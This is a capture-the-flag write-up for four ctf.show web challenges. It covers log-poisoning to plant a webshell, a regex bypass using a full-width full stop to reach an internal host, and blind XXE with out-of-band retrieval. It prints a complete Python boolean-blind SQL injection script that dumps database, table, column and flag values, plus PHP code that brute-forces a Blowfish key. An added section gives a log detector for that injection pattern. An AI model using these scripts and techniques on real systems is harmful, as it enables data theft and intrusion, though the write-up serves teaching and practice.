Sign-in_觀己
Nothing useful was found in the challenge description.
Found a file inclusion.
Tried using PHP pseudo-protocols (wrappers) to execute commands; found that they could not be executed.
Tried remote file inclusion; found that it was not enabled either.
Tried log injection (log poisoning).
The User-Agent value is written to the log, so the request was intercepted and a one-line webshell was written into it.
Connected with 蟻劍 (AntSword).
web1_觀字
Found a regex filter; the goal is to reach the internal target http://192.168.7.68/flag
Use the full-width ideographic full stop 。 in place of . to bypass the regex filter.
web2_觀星
Found that the URL parameter accepts numeric-type arithmetic; tried injection.
Exploiting MySQL implicit type conversion in SQL injection to bypass WAF detection
Wrote a script to attempt blind injection (thanks to 羽師傅 for the hint).
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests

# The id parameter is evaluated as arithmetic ("3-<expr>"), so each payload only has
# to evaluate to 0 or 1; no quotes, spaces or = are needed.
url = "http://2490cccb-ed3d-451e-94c6-54d36cf9a872.chall.ctf.show/index.php?id=3-"
# regexp is used in place of =


def databases():
    # Boolean-based blind extraction of the database name, one character
    # (position i) at a time, testing every candidate ord value j.
    database = ""
    for i in range(1, 50):
        x = 0
        for j in range(32, 135):
            payload = "case(" \
                      "ord(" \
                      "substr(" \
                      "(select(database()))" \
                      "from({0})for(1)" \
                      ")" \
                      ")" \
                      ")" \
                      "when({1})then(0)else(1)end".format(i, j)
            text = requests.get(url + payload).text
            # a match returns 0, so id stays 3 and the page contains "I asked nothing"
            if "I asked nothing" in text:
                database += chr(j)
                x = 1
            if j == 132:
                # no candidate matched at this position: the string is complete
                if x == 0:
                    print("database name :" + database)
                    exit()


def tables():
    # Same technique; table_schema is compared with regexp against hex 'web1'
    table = ""
    for i in range(1, 50):
        x = 0
        for j in range(32, 135):
            payload = "case(" \
                      "ord(" \
                      "substr(" \
                      "(select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(0x77656231))" \
                      "from({0})for(1)" \
                      ")" \
                      ")" \
                      ")" \
                      "when({1})then(0)else(1)end".format(i, j)
            text = requests.get(url + payload).text
            if "I asked nothing" in text:
                table += chr(j)
                x = 1
            if j == 132:
                if x == 0:
                    print("table name:" + table)
                    exit()


def columns():
    # Same technique; table_name is compared with regexp against hex 'flag'
    column = ""
    for i in range(1, 50):
        x = 0
        for j in range(32, 135):
            payload = "case(" \
                      "ord(" \
                      "substr(" \
                      "(select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))" \
                      "from({0})for(1)" \
                      ")" \
                      ")" \
                      ")" \
                      "when({1})then(0)else(1)end".format(i, j)
            text = requests.get(url + payload).text
            if "I asked nothing" in text:
                column += chr(j)
                x = 1
            if j == 132:
                if x == 0:
                    print("column name:" + column)
                    exit()


def getflag():
    # Same technique against the flag column of the flag table
    flag = ""
    for i in range(1, 50):
        x = 0
        for j in range(32, 135):
            payload = "case(" \
                      "ord(" \
                      "substr(" \
                      "(select(group_concat(flag))from(flag))" \
                      "from({0})for(1)" \
                      ")" \
                      ")" \
                      ")" \
                      "when({1})then(0)else(1)end".format(i, j)
            text = requests.get(url + payload).text
            if "I asked nothing" in text:
                flag += chr(j)
                x = 1
            if j == 132:
                if x == 0:
                    print("flag is:" + flag)
                    exit()


# Run the stages one at a time; uncomment the next stage once the previous one has finished
databases()
#tables()
#columns()
#getflag()
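From the defender's side, the probe above has a very recognisable shape: hundreds of requests from one client whose id parameter carries an arithmetic tail built only from case/ord/substr/when/then. The following is an added detection example, not part of the original writeup; the log format (Apache-style access log) and the sample lines are constructed, and the threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log lines (not taken from the page): the first three mimic the
# boolean-blind probes the script above sends, the last one is an ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=3-case(ord(substr((select(database()))from(1)for(1))))when(119)then(0)else(1)end HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=3-case(ord(substr((select(database()))from(1)for(1))))when(120)then(0)else(1)end HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=3-case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(0x77656231))from(1)for(1))))when(102)then(0)else(1)end HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=3 HTTP/1.1" 200 512
"""

# Assumed Apache-style line: client, ident, user, [time], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# Space-free MySQL primitives the page's payloads rely on; each one is a weak signal,
# several together in one query string are a strong one.
MARKERS = ("case(", "ord(", "substr(", "when(", "then(")
# A numeric id immediately followed by an arithmetic operator and more text
ARITH_ID_RE = re.compile(r'[?&]id=\d+[-+*/]\S')


def score_request(path):
    """Return how many blind-SQLi indicators appear in the URL-decoded request path."""
    q = unquote(path).lower()
    hits = sum(1 for m in MARKERS if m in q)
    if ARITH_ID_RE.search(q):
        hits += 1
    return hits


def analyse(log_text, threshold=3):
    """Count requests scoring at least `threshold` per client IP; return {ip: count}."""
    per_ip = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if score_request(m.group("path")) >= threshold:
            per_ip[m.group("ip")] += 1
    return dict(per_ip)


if __name__ == "__main__":
    for ip, n in analyse(SAMPLE_LOG).items():
        print("possible boolean-blind SQLi from %s: %d probe requests" % (ip, n))
```

The real fix for the page's bug is on the application side (bind id as an integer in a prepared statement); this check only gives the operations team a per-client signal to alert on.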
web3_觀圖
View the page source.
Found a PHP file.
Determine the PHP version.
Try brute-forcing the value produced by rand() in 'ctfshow'.rand().
openssl requires the extension to be enabled; just edit php.ini.
<?php
// Brute-force the rand() value: the key is 8 bytes of md5('ctfshow'.$i), and the
// right $i decrypts the Blowfish-ECB ciphertext to an image filename.
$len = rand();
print ($len."\n");
for($i=0;$i<$len;$i++){
    $key = substr(md5('ctfshow'.$i),3,8);
    $image="Z6Ilu83MIDw=";
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    // stop at the first candidate whose plaintext looks like an image filename
    if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){
        print($str." ");
        print($i);
        break;
    }
}
?>
The brute force succeeded; derive the key from that value and encrypt "config.php" with it.
<?php
// Rebuild the key from the brute-forced value and encrypt the target filename
$i = 27347;
$key = substr(md5('ctfshow'.$i),3,8);
$c = "config.php";
print(openssl_encrypt($c,'bf-ecb', $key));
?>
Access that file.
Because the file type is converted to gif, the file contents cannot be viewed directly; the file has to be downloaded and then processed.
web4_觀心
Capture the request.
Found the key information; guessed it was an XXE vulnerability.
Found that there was no output echoed back; with a hint from an expert, the vulnerability is Blind XXE.
XXE defense and exploitation techniques: from XML to remote code execution
XXE and Blind_OOB_XXE
Through the API endpoint, access http://IP地址/test.xml (IP地址 = IP address).
View the contents of 1.txt on the VPS.